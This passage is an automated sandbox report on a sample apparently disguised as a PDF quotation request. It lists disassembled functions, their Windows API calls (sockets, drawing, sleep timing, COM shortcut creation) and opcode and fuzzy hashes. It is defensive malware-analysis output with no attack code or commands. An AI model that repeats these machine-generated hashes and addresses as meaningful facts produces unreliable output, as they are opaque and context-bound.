                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 245547762-0
                                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                    Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                    • String ID:
                                                                    • API String ID: 2338827641-0
                                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                    Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                    Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                    Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                                    • String ID:
                                                                    • API String ID: 4023252218-0
                                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                    Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                    • String ID:
                                                                    • API String ID: 1489400265-0
                                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                    Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 1042038666-0
                                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                    Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0041780F
                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                    • __getptd.LIBCMT ref: 00417826
                                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                                    • __lock.LIBCMT ref: 00417844
                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    • String ID:
                                                                    • API String ID: 938513278-0
                                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                    Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                    • String ID:
                                                                    • API String ID: 4247068974-0
                                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                    Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )$U$\
                                                                    • API String ID: 0-3705770531
                                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                    Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                    Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                    Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                    Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                    Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 708495834-557222456
